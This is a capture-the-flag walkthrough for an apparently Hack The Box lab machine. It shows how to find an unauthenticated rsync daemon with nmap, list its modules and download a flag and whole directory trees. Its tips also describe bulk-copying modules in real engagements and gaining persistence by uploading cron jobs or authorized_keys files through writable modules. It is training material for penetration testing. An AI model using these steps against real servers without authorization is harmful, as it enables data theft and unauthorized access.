⚠️ Legal Disclaimer: This content is for educational purposes only. Always ensure you have proper authorization before testing

Synced introduces rsync — a fast, incremental file transfer utility widely used for backups and deployments on Linux systems. When rsync is exposed on the network without authentication, it behaves like an anonymous FTP server but for entire directory trees. An attacker can list and download any module the daemon exposes, which often includes sensitive configuration files, private keys, and data backups.

Tools: nmap · rsync  ·  Difficulty: Very Easy  ·  OS: Linux
01 — What You Will Learn
SkillWhy it matters
Identifying rsync with NmapPort 873 is uncommon enough that many defenders overlook it
Listing rsync modulesModule enumeration reveals what directories are shared without credentials
Downloading entire directory treesRsync downloads recursively — one command can grab gigabytes of data
Credential-free file accessNo-auth rsync modules are a critical finding equivalent to anonymous FTP
02 — Reconnaissance
Nmap scan
nmap -sV -sC -p- --min-rate 5000 10.129.x.x
Relevant output
PORT STATE SERVICE VERSION 873/tcp open rsync (protocol version 31)

What you're seeing: rsync on port 873, its standard port. Protocol version 31 corresponds to rsync 3.x — the current stable line. No authentication headers in the banner means anonymous access is likely enabled.

ℹ  Rsync is commonly deployed on backup servers, CI/CD systems, and web hosting environments. It's frequently forgotten about after initial setup — making it a reliable source of stale credentials and config files in real assessments.
03 — Enumerating Rsync Modules

Rsync organises shared directories into modules. List them by connecting without specifying a path.

List available modules
rsync rsync://10.129.x.x/
Output
public Anonymous Share

What you're seeing: a module named public with no password. List its contents next.

List the module contents
rsync rsync://10.129.x.x/public/
Output
drwxr-xr-x 4,096 2022/10/24 22:02:23 . -rw-r--r-- 33 2022/10/24 21:32:03 flag.txt
04 — Downloading Files
Download the flag
rsync rsync://10.129.x.x/public/flag.txt .
Download an entire module recursively
rsync -av rsync://10.129.x.x/public/ ./loot/
Read the flag
cat flag.txt
✓ Submit the flag string to complete the machine.
⚠  In real engagements, always grab the entire module with -av before doing anything else. You want a local copy of everything before the window closes.
05 — Rsync Command Reference
CommandWhat it does
rsync rsync://host/List all available modules on the daemon
rsync rsync://host/module/List files inside a specific module
rsync rsync://host/module/file .Download a single file
rsync -av rsync://host/module/ ./dir/Recursively download entire module with verbose output
rsync -av --list-only rsync://host/module/List all files without downloading
rsync file rsync://host/module/Upload a file (if write access is permitted)
06 — Key Takeaways
An unauthenticated rsync module is functionally equivalent to an open network share. If write access is also enabled, it becomes a code execution vector — upload a cron job or authorized_keys file and wait.
ConceptReal-world relevance
Port 873 in scopeRsync is routinely missed in vulnerability scans that target only top-1000 ports
Anonymous modulesBackup modules commonly left open for convenience — contain database dumps, config files, SSH keys
Write access escalationIf rsync write is allowed to ~/.ssh/ or cron directories, achieving persistence is trivial
Full directory syncUnlike FTP, rsync transfers entire trees in one command — faster exfiltration in a real engagement